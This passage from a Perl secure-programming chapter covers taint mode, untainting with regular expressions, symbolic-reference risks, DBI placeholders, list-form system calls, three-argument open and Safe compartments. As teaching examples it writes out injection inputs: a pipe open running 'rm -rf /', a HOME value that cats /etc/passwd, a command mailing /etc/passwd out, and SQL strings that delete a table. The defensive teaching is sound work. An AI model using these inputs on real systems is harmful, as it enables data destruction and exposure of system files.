I can’t control how people run my programs or
what input they give it, and given the chance, they’ll do everything I
don’t expect. This can be a problem when my program tries to pass on
that input to other programs. When I let just anyone run my programs,
like I do with web applications, I have to be especially careful. Perl
comes with features to help me protect myself against that, but they
only work if I use them, and use them wisely.
If I don’t pay attention to the data I pass to
functions that interact with the operating system, I can get myself in
trouble. Take this innocuous-looking line of code that opens a file:
open my $fh, $file or die "Could not open [$file]: $!";
That looks harmless, so where’s the problem? As with most problems, the harm comes in a combination of things. What is in
$file
and from where did its value come? In real-life code reviews, I’ve seen people do such things as using elements of @ARGV
or an environment variable, neither of which I can control as the programmer:my $file = $ARGV[0]; # OR === my $file = $ENV{FOO_CONFIG};
How can that cause problems? Look at the documentation for
open
. Have you ever read all of the 400-plus lines in its entry in perlfunc, or its own manual, perlopentut?
There are so many ways to open resources in Perl that it has its own
documentation page! Several of those ways involve opening a pipe to
another program:open my $fh, "wc -l *.pod |"; open my $fh, "| mail joe@example.com";
To misuse these programs, I just need to get the right thing in
$file
so I execute a pipe open instead of a file open. That’s not so hard:% perl program.pl "| mail joe@example.com"
% FOO_CONFIG="rm -rf / |" perl program
This can be especially nasty if I can get
another user to run this for me. Any little chink in the armor
contributes to the overall insecurity. Given enough pieces to put
together, someone eventually gets to the point where they can compromise
the system.
There are other things I can do to prevent
this particular problem and I’ll discuss those at the end of this
chapter, but in general, when I get input, I want to ensure that it’s
what I expect before I do something with it. With careful programming, I
won’t have to know about everything
open
can do. It’s not going to be that much more work than the careless method, and it will be one less thing I have to worry about.Taint Checking
Configuration is all about reaching outside
the program to get data. When users choose the input, they can choose
what the program does. This is more important when I write programs for
other people to use. I can trust myself to give my own program the right
data (usually), but other users, even those with the purest of
intentions, might get it wrong.
Under taint checking, Perl doesn’t let me
use unchecked data from outside the source code to affect things outside
the program. Perl will stop my program with an error. Before I show
more, though, understand that taint checking does not prevent bad things
from happening. It merely helps me track down areas where some bad
things might happen and tells me to fix those.
When I turn on taint checking with the
-T
switch, Perl marks any data that come from outside the program as
tainted, or insecure, and Perl won’t let me use those data to interact
with anything outside of the program. This way, I can avoid several
security problems that come with communicating with other processes.
This is all or nothing. Once I turn it on, it applies to the whole
program and all of the data.
Perl sets up taint checking at compile time, and
it affects the entire program for the entirety of its run. Perl has to
see this option very early to allow it to work. Here’s a toy program
that uses the external command echo to print a message:
#!/usr/bin/perl # tainted_args.pl system qq|echo "Args are -> @ARGV"|;
When I run this normally, there’s no problem:
% perl tainted_args.pl Amelia
Args are -> Amelia
When I specify the
-T
switch on the command line, I turn on taint checking and run into a problem. The %ENV
hash is tainted; it’s the PATH
component, which something like system
or exec
might use to locate an external program that is the problem (but more on that coming up):% perl -T tainted_args.pl Amelia
Insecure $ENV{PATH} while running with -T switch at tainted-args.pl line 4.
If I always want taint checking, I can put it on the shebang line:
#!/usr/bin/perl -T # tainted_args_shebang.pl system qq|echo "Args are -> @ARGV"|;
When I run perl without the
-T
while -T
is on the shebang line, I have a problem:% perl tainted_args_shebang.pl Amelia
"-T" is on the #! line, it must also be used on the command line at tainted_args_shebang.pl line 1.
If I call the program with
perl
, I have to specify the -T
in both places, which brings me back to the same error:% perl -T tainted_args.pl Amelia
Insecure $ENV{PATH} while running with -T switch at tainted_args.pl line 4.
I can get rid of this duplicity by not using perl and running the program directly:
% ./tainted_args.pl Amelia
Insecure $ENV{PATH} while running with -T switch at tainted_args.pl line 4.
Now I fix that error by getting rid of the
PATH
key in %ENV
and using the full path to echo in my system
call:#!/usr/bin/perl -T # tainted_args_no_path.pl delete $ENV{PATH}; system qq|echo "Args are -> @ARGV"|;
Now I have another problem:
% ./tainted_args_no_path.pl foo
Insecure dependency in system while running with -T switch at ./tainted_args_no_path.pl line 5.
I tried to interpolate
@ARGV
into that system
call, but that’s tainted too. I show how to fix that later.Warnings Instead of Fatal Errors
With the
-T
switch,
taint violations are fatal errors, and that’s generally a good thing.
However, if I’m handed a program developed without careful attention
paid to taint, I still might want to run the program. It’s not my fault
it’s not taint safe yet, so perl has a gentler version of taint checking.
The
-t
switch (that’s the little brother to -T
)
does the same thing as normal taint checking but merely issues warnings
when it encounters a problem. This is only intended as a development
feature so I can check for problems before I give the public the chance
to try its data on the program:% perl -t tainted_args_no_path.pl Amelia
Insecure dependency in system while running with -t switch at tainted_args_no_path.pl line 5.
Args are -> Amelia
I get the same error, but the program continues.
Similarly, the
-U
switch lets Perl perform otherwise unsafe operations, effectively turning off taint checking. Perhaps I’ve added -T
to a program that is not taint safe yet, but I’m working on it and want
to see it run even though I know there is a taint violation:% perl -TU tainted_args_no_path.pl Amelia
Args are -> Amelia
I still have to use
-T
on the command line, though, or I get the same “too late” message I got previously and the program does not run:% perl -U tainted_args_no_path.pl Amelia
Too late for "-T" option at tainted_args_no_path.pl line 1.
If I also turn on warnings (as I always do, right?), I’ll get the taint warnings just like I did with
-t
.% perl -TU -w tainted_args_no_path.pl Amelia
Insecure dependency in system while running with -T switch at tainted_args_no_path.pl line 5.
Args are -> Amelia
Inside the program, I can check the actual situation by looking at the value of the Perl special variable
${^TAINT}
. It’s true if I have enabled any of the taint modes (including with -U
), and false otherwise. For normal, fatal-error taint checking it’s 1
and for the reduced effect, warnings-only taint checking it’s -1. Don’t
try to modify it; it’s a read-only value. Remember, it’s either all or
nothing with taint checking.Automatic Taint Mode
Sometimes Perl turns on taint checking for me.
When Perl sees that the real and effective users or groups are different
(so, I’m running the program as a different user or group than I’m
logged in as), Perl realizes that I have the opportunity to gain more
system privileges than I normally have and turns on taint checking. This
way, when other users have to use my program to interact with system
resources, they don’t get the chance to do something they shouldn’t by
carefully selecting the input. That doesn’t mean the program is secure,
it’s only as secure as using taint checking wisely can make it.
mod_perl
Since I have to enable taint checking early in
Perl’s run, mod_perl needs to know about tainting before it runs a
program. In my Apache server configuration, I use the
PerlTaintCheck
directive for mod_perl 1.x:PerlTaintCheck On
In mod_perl 2, I include
-T
in the PerlSwitches
directive:PerlSwitches -T
I can’t use this in
.htaccess
files or other, later configurations. I have to turn it on for all of
mod_perl, meaning that every program run through mod_perl, include
otherwise normal CGI programs run with ModPerl::PerlRun
or ModPerl::Registry
,
use it. This might annoy users for a bit, but when they get used to the
better programming techniques, they’ll find something else to gripe
about.Tainted Data
Data are either tainted or not. There isn’t any
part- or half-taintedness. Perl only marks scalars (data or variables)
as tainted, so although an array or hash may hold tainted data, they
aren’t taint themselves. Perl never taints hash keys, which aren’t full
scalars with all of the scalar overhead. Remember that because it comes
up later.
I can check for taintedness in a couple of ways. The easiest is the
tainted
function from Scalar::Util
:#!/usr/bin/perl -T # check_taint.pl use Scalar::Util qw(tainted); # this one won't work print "ARGV is tainted\n" if tainted( @ARGV ); # this one will work print "Argument [$ARGV[0]] is tainted\n" if tainted( $ARGV[0] );
When I specify arguments on the command line, they come from outside the program so Perl taints them. The
@ARGV
array is fine, but its contents, $ARGV[0]
, isn’t:% check_taint.pl foo
Argument [foo] is tainted
Any subexpression that involves tainted data inherits taintedness. Tainted data are viral. The next program uses
File::Spec
to create a path in which the first part is my home directory. I want
to open that file, read it line by line, and print those lines to
standard output. That should be simple, right?#!/usr/bin/perl -T # show_file.pl use strict; use warnings; use File::Spec; use Scalar::Util qw(tainted); my $path = File::Spec->catfile( $ENV{HOME}, "data.txt" ); print "Result [$path] is tainted\n" if tainted( $path ); open my $fh, '<', $path or die "Could not open $path"; print while( <$fh> );
The problem is the environment. All of the values in
%ENV
come from outside the program, so Perl marks them as tainted. Any value
I create based on a tainted value becomes tainted as well. That’s a
good thing, since $ENV{HOME}
can be whatever the user wants, including something malicious, such as this line that starts off the HOME
directory with a |
and then runs a command. This variety of attack has actually worked to
grab the password files on big web sites that do a similar thing in CGI
programs. Even though I don’t get the passwords, once I know the names
of the users on the system, I’m ready to spam away:% HOME="| cat ../../../etc/passwd;" ./show_file.pl
Under taint checking, I get an error because Perl catches the
|
character I tried to sneak into the filename:Insecure dependency in piped open while running with -T switch at ./show_file.pl line 12.
Side Effects of Taint Checking
When I turn on taint checking, Perl does
more than just mark data as tainted. It ignores some other information
because it can be dangerous. Taint checking causes Perl to ignore
PERL5LIB
and PERLLIB
. A user can set either of those so a program will pull in any code he wants. Instead of finding the File::Spec
from the Perl standard distribution, my program might find a different one if an impostor File/Spec.pm
shows up first during Perl’s search through @INC
for the file. When I run my program, Perl finds some File::Spec
, and when it tries one of its methods, something different might happen.
To get around an ignored
PERL5LIB
, I can use the lib
module or the -I
switch, which is fine with taint checking (although it doesn’t mean I’m safe):% perl -Mlib=/Users/brian/lib/perl5 program.pl
% perl -I/Users/brian/lib/perl5 program.pl
I can even use
PERL5LIB
on the command line. I’m not endorsing this, but it’s a way people can get around your otherwise good intentions:% perl -I$PERL5LIB program.pl
Also, Perl treats the
PATH
as dangerous. It’s something that the person running this program can
set to anything they like. Otherwise, I could use the program running
under special privileges to write to places where I shouldn’t. Even
then, I can’t trust the PATH
for the same reason that I can’t trust PERL5LIB
. I can’t tell which program I’m really running if I don’t know where it is. In this example, I use system
to run the cat command. I don’t know which executable it actually is because I rely on the path to find it for me:#!/usr/bin/perl -T # cat.pl system "cat /Users/brian/.bashrc"
Perl’s taint checking catches the problem:
Insecure $ENV{PATH} while running with -T switch at ./cat.pl line 3.
Using the full path to cat in the
system
command doesn’t help either. Rather than figuring out when the PATH
should apply and when it shouldn’t, it’s always insecure:#!/usr/bin/perl -T delete $ENV{PATH}; system "/bin/cat /Users/brian/.bashrc"
In a similar way, the other environment variables such as
IFS
, CDPATH
, ENV
or BASH_ENV
can be problems. Their values can have hidden influence on things I try to do within my program.Untainting Data
The only approved
way to untaint data is to extract the good parts of it using the
regular expression memory matches. By design, Perl does not taint the
parts of a string that I capture in regular expression memory, even if
Perl tainted the source string. Perl trusts me to write a safe regular
expression. Again, it’s up to me to make it safe.
In this line of code, I untaint the first element of
@ARGV
to extract a filename. I use a character class to specify exactly what I
want. In this case, I only want letters, digits, underscores, dots, and
hyphens. I don’t want anything that might be a directory separator:my( $file ) = $ARGV[0] =~ m/\A([A-Z0-9_.-]+)\Z/i;
I constrain the regular expression so it has to
match the entire string, too. That is, if it contains any characters
that I didn’t include in the character class, the match fails. I’m not
going to try to change invalid data into good data. You’ll have to think
about how you want to handle that for each situation.
It’s really easy to use this incorrectly and some
people annoyed with the strictness of taint checking try to untaint
data without really untainting it. I can remove the taint of a variable
with a trivial regular expression that matches everything:
my( $file ) = $ARGV[0] =~ m/(.*)/s;
If I want to do something like this, I might as
well not even use taint checking. You might look out for this if you
require your programmers to use taint checking and they want to avoid
the extra work to do it right. I’ve caught this sort of statement in
many code reviews, and it always surprises me that people get away with
it.
I might be more diligent and still wrong, though. The character class shortcuts,
\w
and \W
(and the POSIX version [:word:]
),
actually take their definitions from the locales. As a clever cracker, I
could manipulate the locale setting in such a way to let through the
dangerous characters I want to use. Instead of the implicit range of
characters from the shortcut, I should explicitly state which characters
I want. I can’t be too careful. It’s easier to list the allowed
characters and add ones that I miss than to list the forbidden
characters, since it also excludes problem characters I don’t know about
yet.
If I turn off locale support, this isn’t a
problem and I can use the character class shortcuts again. Perl uses the
internal locale instead of the user setting (from
LC_CTYPE
for regular expressions). After turning off locale
, \w
is just ASCII letters, digits, and the underscore:{ no locale; my( $file ) = $ARGV[0] =~ m/^([\w.-]+)$/; }
Mark Jason Dominus noted in his http://perl.plover.com/yak/security/
talk that there are two approaches to constructing regular expressions
for untainting data, which he labels as the Prussian Stance and the
American Stance, which I’ve also seen this called “whitelisting” and
“blacklisting”. In the Prussian Stance, I explicitly list only the
characters I allow. I know all of them are safe:
# Prussian = safer my( $file ) = $ARGV[0] =~ m/([a-z0-9_.-]+)/i;
The American Stance is less reliable. Doing it that way, I list the characters I don’t
allow in a negated character class. If I forget one, I still might have
a problem. Unlike the Prussian Stance, where I only allow safe input,
this stance relies on me knowing every character that can be bad. How do
I know I know them all?
# American = uncertainty my( $file ) = $ARGV[0] =~ m/([^$%;|]+)/i;
I prefer something much stricter where I don’t
extract parts of the input. If some of it isn’t safe, none of it is. I
anchor the character class of safe characters to the beginning and end
of the string. I don’t use the
$
anchor since it allows a trailing newline:# Prussian = safer my( $file ) = $ARGV[0] =~ m/^([a-z0-9_.-]+)\z/i;
In some cases, I don’t want regular expressions
to untaint data. Even though I matched the data the way I wanted, I
might not intend any of that data to make its way out of the program. I
can turn off the untainting features of regular expression memory with
the
re
pragma:{ use re 'taint'; # $file still tainted my( $file ) = $ARGV[0] =~ m/^([\w.-]+)$/; }
A more useful and more secure strategy is to
turn off the regular expression untainting globally and only turn it
back on when I actually want to use it. This can be safer because I only
untaint data when I mean to:
use re 'taint'; { no re 'taint'; # $file not tainted my( $file ) = $ARGV[0] =~ m/^([\w.-]+)$/; }
IO::Handle::untaint
The
IO::Handle
module, which is the basis for the line input operator behavior in many
cases, can untaint data for me. Since input from a file is also
external data, it is normally tainted under taint checking:use Scalar::Util qw(tainted); open my $fh, '<', $0 or die "Could not open myself! $!"; my $line = <$fh>; print "Line is tainted!\n" if tainted( $line );
I can tell
IO::Handle
to trust the data from the file. As I’ve said many times before, this
doesn’t mean I’m safe. It just means that Perl doesn’t taint the data,
not that it’s safe. I have to explicitly use the IO::Handle
module to make this work, though:use IO::Handle; use Scalar::Util qw(tainted); open my $fh, '<', $0 or die "Could not open myself! $!"; $fh->untaint; my $line = <$fh>; print "Line is not tainted!\n" unless tainted( $line );
This can be a dangerous operation since I’m getting around taint checking in the same way my
/(.*)/
regular expression did.Hash Keys
You shouldn’t do this, but as a Perl master (or
quiz show contestant) you can tell people they’re wrong when they try to
tell you that the only way to untaint data is with a regular
expression. You shouldn’t do what I’m about to show you, but it’s
something you should know about in case someone tries to do it near you.
Hash keys aren’t full Perl scalar values (as in
the data structure in the Perl guts, commonly called an SV), so they
don’t carry all the baggage and accounting that allows Perl to taint
data. Hash keys are just strings without annotations, so any magic that
might have been attached to the SV doesn’t stick to the hash key. If I
pass the data through a filter that uses the data as hash keys and then
returns the keys, the data are no longer tainted, no matter their source
or what they contain:
#!/usr/bin/perl -T use Scalar::Util qw(tainted); print "The first argument is tainted\n" if tainted( $ARGV[0] ); @ARGV = keys %{ { map { $_, 1 } @ARGV } }; print "The first argument isn't tainted anymore\n" unless tainted( $ARGV[0] );
I’ve run into people doing this inadvertently as
they take user input or configuration and sticking it into a hash. The
hash values are still tainted, but I might be able to sneak in bad keys
that way.
Don’t do this.
I’d like to put that first sentence in all caps, but I know the editors
aren’t going to let me do that, so I’ll just say it again: don’t do
this. Save this knowledge for a Perl quiz show, and maybe tear it out of
this book before you pass it on to a coworker.
Taint::Util
There’s a CPAN module,
Taint::Util
, from Ævar Arnfjörð Bjarmason that makes it really easy to untaint any data:use Taint::Util; untaint $ENV{PATH};
It messes with the scalar value directly behind the scenes. But, it lets me go the other way too. I can taint data even if perl didn’t already do that for me:
use Taint::Util; my $camel = 'Amelia'; taint $camel;
If I’m creating a bunch of potentially dangerous
data that I don’t intend to ever leave the program and I taint it
myself. This is an especially paranoid, but not completely unreasonable,
approach to keeping data inside the program. This is also a good
utility for testing when you want to check the behavior of something
when it encounters tainted data. Combining this with
Test::Taint
can be quite useful.Choosing Untainted Data with Tainted Data
Another exception to the usual rule of tainting
involves the conditional operator. Earlier I said that a tainted value
also taints its expression. That doesn’t quite work for the conditional
operator when the tainted value is only in the condition that decides
which value I get. As long as the chosen value is not tainted, the
result isn’t tainted either:
my $value = $tainted_scalar ? "Amelia" : "Shlomo";
This doesn’t taint
$value
because the conditional operator is really just shorthand for a longer if-else
block in which the tainted data aren’t in the expressions connected to $value
. The tainted data only show up in the conditional:my $value = do { if( $tainted_scalar ) { "Amelia" } else { "Shlomo" } };
Symbolic References
A symbolic reference uses the value of a scalar as the name of a variable. This happens when I use a nonreference as a reference:
my $name = 'Amelia'; $$name = 'Camel'; # sets $Amelia
I tried to dereference
$name
. Since that variable wasn’t a reference, perl used the value in that variable, Amelia
, as the name of the variable that it would assign to.
I can do this with any of the data types, including the names of subroutines:
my $sub_name = time % 2 ? 'make_camel' : 'make_llama'; &$sub_name( @arguments );
I can use a symbolic method name too:
my $method = time % 2 ? 'make_camel' : 'make_llama'; $object->$method( @arguments );
This is a useful feature for a dynamic language,
but it’s also a dangerous feature. If I take those subroutine or method
names from user data, I might inadvertently let the user do things I
had not anticipated. This is particularly pernicious because a user can
sneak in a fully qualified subroutine name:
my $method = $ARGV[0]; # POSIX::exit $object->$method( @arguments );
Here’s a small program that implements a
simple interpreter that’s designed to let the user decide which
subroutine they want to run:
# repl.pl use v5.10; use POSIX; use Cwd qw(getcwd); say "Cwd is ", getcwd(); REPL: { print ">>> "; my $_ = <>; last REPL if /quit/; chomp; my( $operation, $operand ) = split /\s+/; my $value = eval { &$operation( $operand ) }; say "$operation( $operand ) => $value"; redo; } sub factorial { my $p = 1; $p *= $_ foreach ( 1 .. $_[0] ); $p } sub summerial { my $p = 0; $p += $_ foreach ( 1 .. $_[0] ); $p } say "Cwd is now ", getcwd(); say "Got to the end";
My run starts innocently enough as I call the two subroutines I defined, but then I sneak in
POSIX::chdir
:% perl repl.pl
Cwd is /Users/Amelia
>>> factorial 5
factorial( 5 ) => 120
>>> summerial 9
summerial( 9 ) => 45
>>> POSIX::chdir /Volumes/Scratch
POSIX::chdir( /Volumes/Scratch ) => 1
>>> quit
Cwd is now /Volumes/Scratch
Got to the end
After I leave the loop, I see that I’ve changed
the current working directory. A more complicated program might read
from files it shouldn’t or leave behind files I won’t notice.
I can do the same with a method call through
a quirk of Perl’s method lookup. If I give a full package specification
in the method, perl calls exactly that subroutine even if it has nothing to do with the class.
# other_method.pl use v5.10; use CGI; package Camel { sub new { bless {}, $_[0] } sub clone { ... } } my( $method, @args ) = @ARGV; $method //= 'new'; my $object = Camel->$method( @args ); say "object is type $object";
I run it first with no argument, which selects the
new
method by default, and I get back the Camel
object that I expect:% perl5.14.2 other_method.pl
object is type Camel=HASH(0x7f8413806268)
When I call it with
CGITempFile::new
, I get a CGITempFile
object back:% perl5.14.2 other_method.pl CGITempFile::new
object is type CGITempFile=SCALAR(0x7fefd3031130)
I chose that class for a reason. It’s
DESTROY
method tries to unlink
a file. I didn’t give an additional argument so it has no file to try to remove. The CGITempFile
class comes from the CGI
module, a module that comes with Perl and is likely to be there. I can potentially delete a file doing this.
If I want to choose a subroutine or method based
on a variable’s value, there are several things I can do to ensure I
don’t allow to much. My most common tactic is to make a look up table of
allowed names:
use Carp qw(croak); sub _is_allowed { my( $self, $method ) = @_; state $allowed = { some_sub => 1, }; return exists $allowed->{$method}; } if( $self->_is_allowed( $method ) ) { $self->$method( @arguments ); } else { croak "Disallowed method! [$method]"; }
I stay away from solutions that check the form of the value, for instance ensuring that there are only identifier characters:
if( $method =~ /\A\p{ID_Start}\p{ID_Continue}+\z/ ) { $self->$method( @arguments ); } else { croak "Disallowed method! [$method]"; }
A class might have more subroutines defined in
the symbol table than I anticipate, especially if other modules imported
symbols. I typically don’t want to allow something to call any defined
subroutine. Not only that, a subroutine name that has the right form
might not be defined. That would cause an fatal error when I try to call
it.
Defensive Database Programming with DBI
It used to be that buffer overflows were the
major source of security problems. Now that the world seems to be run by
database servers, SQL injection attacks are more worrisome. If I didn’t
know any better, I might make a database query by interpolating data
from user data into a string which I then send to a database server. I’m
still using
-T
, but as I said before, it’s a development aid, not a guarantee. There are two big problems in this code:#/usr/bin/perl -T use CGI; use DBI; my $cgi = CGI->new; my $dbh = DBI->connect( ... ); # fill in the details yourself my $name = $cgi->param( 'username' ); my $query = "SELECT * FROM Users WHERE name='$name'"; my $result = $dbh->fetchrow_hashref( ... );
First, I have no idea what the value of
$name
is. What if it has a literal single-tick in it? What if $name
is Amelia' OR name='root
? Once I interpolate the string, my query looks like:SELECT * FROM Users WHERE name='Amelia' OR name='root'
The results of the query, which I’ve now crafted
in a special way, might return information I’m not supposed to have.
Have you ever wondered why you can’t have spaces or puntuation in your
web site usernames? Most likely the application can’t handle this very
situation (probably because the programmers are lazy, not because the
technology is inferior), so they simply limit the characters you can
use.
I could be even more malicious by trying to corrupt a database. Instead of expanding the
SELECT
statement in my last example, I can try to run a completely new SQL statement. What if the HTML form username
is Amelia'; DELETE FROM Users; SELECT * FROM Users WHERE name='
?SELECT * FROM Users WHERE name='Amelia'; DELETE FROM Users; SELECT * FROM Users WHERE name='';
There are plenty of people sitting at their
computer figuring out exactly what they should put in the right place to
make your application do something like this. Some do it for fun, but
some do it for profit. There are even more people with nothing better to
do than download rootkits and penetration programs they don’t
understand just so they can mess with you just to impress their friends
at your expense.
DBI
can handle arbitrary values in queries without a problem. I use placeholders instead of Perl’s string interpolation. The placeholder, represented as a literal question mark, ?
, reserves a spot for the value that I will use later. I make a statement handle with prepare
:my $sth = $dbh->prepare("SELECT * FROM Users WHERE name=?");
When it’s time for me to run the query, I use
DBI
‘s execute
to fill in the placeholders. I think of this like I do sprintf
. The first argument to execute
goes in the first placeholder, and so on:my $rc = $dbh->execute( $name );
The placeholder magic automatically quotes the
values and escapes any special characters in the value. Quote characters
in the data are no longer quote characters, semicolons don’t create new
statements, and so on. No more SQL injection vunerability! Not only
that, but once I’ve prepared a query, I can easily re-use it simply by
calling
execute
again.
I still haven’t solved the whole problem here.
I’ve prevented the SQL injection attack, but I still haven’t dealt with
the actual value. Even if it maintains my original query, the value
might make it do something I don’t intend.
Back in my example, I know that
$name
tainted, but in this program I mistakenly discount that because I don’t
think it will matter. I’m not running a shell command with it, so it
must be safe, right?
By default,
DBI
doesn’t care about tainted data. If I’m being paranoid though (and
that’s a good thing when it comes to security, remember), I want to
scrub any data before I use them outside the program, and a database
server is outside the program. Perl’s not going to stop me from using
tainted data with DBI
, so I tell DBI
to handle that by setting TaintIn
when I connect. Setting TaintIn
only works if I’ve turned on taint-checking:my $dbh = DBI->connect( $dsn, $user, $password, { TaintIn => 1, ... } );
I can also set
TaintIn
for just a particular statement handle:my $sth = $dbh->prepare( "SELECT * FROM Users WHERE name=?", { TaintIn => 1, ... } );
That’s only half of it though. Once I get the
results back, should I trust that data? It does come from outside the
program, so maybe I shouldn’t trust it. Not too many people think about
the threats from within. To taint the data in the results, I set
TaintOut
:my $dbh = DBI->connect( $dsn, $user, $password, { TaintIn => 1, TaintOut => 1, ... } );
Alternatively, I can just set
Taint
and get them both at the same time:my $dbh = DBI->connect( $dsn, $user, $password, { Taint => 1, ... } );
Either way,
DBI
will taint its results, and I have to handle them just as I would any
other tainted data. That might seem like a lot of work for something
that might never happen, but remember it only needs to happen once to
make a big mess and a lot more work for you.
And, before I move on, I’ll write one more thing
about this particular example. It’s not about Perl (or any other
language); an application should never be able to do more than I intend
it to do. I might have tricked my
SELECT
into also running a DELETE
,
but if my CGI script only needs to read data, it shouldn’t have the
permissions to do anything to change the data, whether that means
updating it, adding it, or even deleting it. Likewise, any program that
is supposed to only add data shouldn’t be able to read or update other
records. Any server that I should use in these situations will have a
way to define users or groups where you can minutely control the
permissions. My program uses the appropriate credentials for the job I
want it to do.List Forms of system and exec
If I use either
system
or exec
with a single argument, Perl looks in the argument for shell
meta-characters. If it finds meta-characters, Perl passes the argument
to the underlying shell for interpolation. Knowing this, I could
construct a shell command that did something the program does not
intend. Perhaps I have a system
call that seems harmless, like the call to echo:system( "/bin/echo $message" );
As a user of the program, I might try to craft the input so
$message
does more than provide an argument to echo. This string also terminates the command by using a semicolon, then starts a mail command that uses input redirection:'Hello World!'; mail joe@example.com < /etc/passwd
Taint checking can catch this, but it’s still up
to me to untaint it correctly. As I’ve shown, I can’t rely on taint
checking to be safe. I can use
system
and exec
in the list form. In that case, Perl uses the first argument as the program name and calls execvp
directly, bypassing the shell and any interpolation or translation it might do:system "/bin/echo", $message;
Using an array with
system
does not automatically trigger its list processing mode. If the array has only one element, system
only sees one argument. If system
sees any shell metacharacters in that single scalar element, it passes
the whole command to the shell, special characters and all:@args = ( "/bin/echo $message" ); system @args; # single argument form still, might go to shell @args = ( "/bin/echo", $message ); system @args; # list form, which is fine.
To get around this special case, I can use
the indirect object notation with either of these functions. Perl uses
the indirect object as the name of the program to call and interprets
the arguments just as it would in list form, even if it only has one
element. Although this example looks like it might include
$args[0]
twice, it really doesn’t. It’s a special indirection object notation
that turns on the list processing mode and assumes that the first
argument is the command name:system { $args[0] } @args;
In this form, if
@args
is just the single argument ( "/bin/echo 'Hello'" )
, system
assumes that the name of the command is the whole string. Of course, it fails because there is no command /bin/echo 'Hello'
. Somewhere in my program I need to go back and ensure those pieces show up as separate elements in @args
.
To be even safer, I might want to keep a hash of allowed programs for
system
. If the program is not in the hash, I don’t execute the external command:if( exists $Allowed_programs{ $args[0] } ) { system { $args[0] } @args; } else { warn qq|"$args[0]" is not an allowed program|; }
Three Argument open
Since v5.6, the
open
built-in has a three (or more) argument form that separates the file mode from the filename. My previous open
s were problems because the filename string also told open
what to do with the file. If I could infect the filename, I could trick open
into doing things the programmer didn’t intend. In the three argument form, whatever characters show up in $file
are the characters in the filename, even if those characters are |
, >, and so on:#!/usr/bin/perl -T my( $file ) = $ARGV[0] =~ m/([A-Z0-9_.-]+)/gi; open my $fh, '>>', $file or die "Could not open for append: $file";
This doesn’t get around taint checking, but it is safer. You’ll find a more detailed discussion of this form of
open
in Chapter 8 of Intermediate Perl, as well as perlopentut.sysopen
The
sysopen
function gives me even more control over file access. It has a three
argument form that keeps the access mode separate from the filename and
has the added benefit of exotic modes that I can configure minutely. For
instance, the append mode in open
creates the file if it doesn’t already exist. That’s two separate flags in sysopen
: one for appending and one for creating:#!/usr/bin/perl -T use Fcntl qw(:DEFAULT); my( $file ) = $ARGV[0] =~ m/([A-Z0-9_.-]+)/gi; sysopen( my( $fh ), $file, O_WRONLY|O_APPEND|O_CREAT ) or die "Could not open file: $!\n";
Since these are separate flags, I can use them apart from each other. If I don’t want to create new files, I leave off the
O_CREAT
.
If the file doesn’t exist, Perl won’t create it, so no one can trick my
program into making a file he might need for a different exploit:#!/usr/bin/perl -T use Fcntl qw(:DEFAULT); my( $file ) = $ARGV[0] =~ m/([A-Z0-9_.-]+)/gi; sysopen( my( $fh ), $file, O_WRONLY|O_APPEND ) or die "Could not append to file: $!";
Limit Special Privileges
Since Perl automatically turns on taint checking
when I run the program as a different user than my real user, I should
limit the scope of the special privileges. I might do this by forking a
process to handle the part of the program that requires greater
privileges, or give up the special privileges when I don’t need them
anymore. I can set the real and effective users to the real user so I
don’t have more privileges than I need. I can do this with the
POSIX
module:use POSIX qw(setuid); setuid( $< );
There are other ways to do this, but they
are beyond the scope of this chapter (and even this book, really), and
they depend on your particular operating system, and you’d do the same
thing with other languages too. This isn’t a problem specific to Perl,
so you handle it in the same way as you do in any other language:
compartmentalize or isolate the special access.
Safe Compartments
The
Safe
module provides me a way to limit what I allow to happen for a section
of the code. It creates a new namespace which that code is trapped in,
unable to look outside that namespace, and it limits the operations the
code in that compartment can do.
I use
Safe
much like eval
. I give the reval
method a code string, which it compiles under its restrictions, and if
everything’s okay, runs it. While running it, it may encounter into
other violations which will stop its action:# safe.pl use v5.16; use Safe 2.35; say "Running $0 under $^V with Safe ", Safe->VERSION; my $compartment = Safe->new; my $code =<<'CODE'; use v5.10; say "Hello Safe!"; CODE $compartment->reval( $code ) or do { my $error = $@; warn "Safe compartment error! $error"; };
When I run this, I get an error:
% perl safe.pl
Running safe.pl under v5.18.0 with Safe 2.35
Safe compartment error! 'require' trapped by operation mask
The
Safe
“compartment” won’t run that code because I haven’t allowed it to carry out the require
“opcode” that use
needs. The compartment has a very limited set of default operations it
allows, but I have to tell it to allow the useful stuff. The Opcode
module, which Safe
relies on, lists the opcodes and the names of sets of opcodes I can use. So far, it trapped the require
opcode, so I can permit that one:my $compartment = Safe->new; $compartment->permit( 'require' );
When I run it again, I get another error:
% perl safe.pl
Running safe.pl under v5.18.0 with Safe 2.35
Safe compartment error! 'say' trapped by operation mask
I can add that opcode to the ones I permit. This
is much like the Prussian stance that I mentioned earlier. I only allow
the things that I need:
my $compartment = Safe->new; $compartment->permit( qw(require say) );
Now it all works:
% perl safe.pl
Running safe.pl under v5.18.0 with Safe 2.35
Hello Safe!
If I want to allow a set of opcodes instead of listing them individually, I can use the sets defined in
Opcode
, much like import tags in modules. For example, I can include all the input-output opcodes with :base_io
:$compartment->permit( qw(require :base_io) );
With the
permit
, permit_only
, deny
, and deny_only
methods to create the set of allowable operations.
Inside the compartment,
Safe
uses it’s own namespace although it looks like the main::
package inside the reval
. By default, only the *_
variables, $_
and @_
,
are visible. That way, the compartment can’t betray the environment or
other information that might be sensitive. Here I try to use the $0
variable to output the program name:# safe-no-share.pl use v5.16; use Safe 2.35; my $compartment = Safe->new; $compartment->permit( qw(require say) ); my $code =<<'CODE'; use v5.10; say "Hello Safe, from $0!"; CODE $compartment->reval( $code ) or do { my $error = $@; warn "Safe compartment error! $error"; };
I don’t see the program name in the output because
Safe
hides it:% perl safe-no-share.pl
Hello Safe, from !
If I want to share a particular variable, I can use the
share_from
method to let the compartment see a variable from a particular package:# safe-share.pl use v5.16; use Safe 2.35; say "Running $0 under $^V with Safe ", Safe->VERSION; my $compartment = Safe->new; $compartment->permit( qw(require say) ); $compartment->share_from( 'main', [ qw( $0 ) ] ); my $code =<<'CODE'; use v5.10; say "Hello Safe, from $0!"; CODE $compartment->reval( $code ) or do { my $error = $@; warn "Safe compartment error! $error"; };
Now it works:
% perl safe-share.pl
Hello Safe, from safe-share.pl!
There’s more about what you can allow, deny, share, or hide in the compartment, and the
Safe
module tells you about it.
There is one more feature that I really like. A compartment will delete
DESTROY
and AUTOLOAD
methods it finds in the class it uses. Although it looks like the compartment uses the main::
namespace, it’s really a special one which I can get with the root
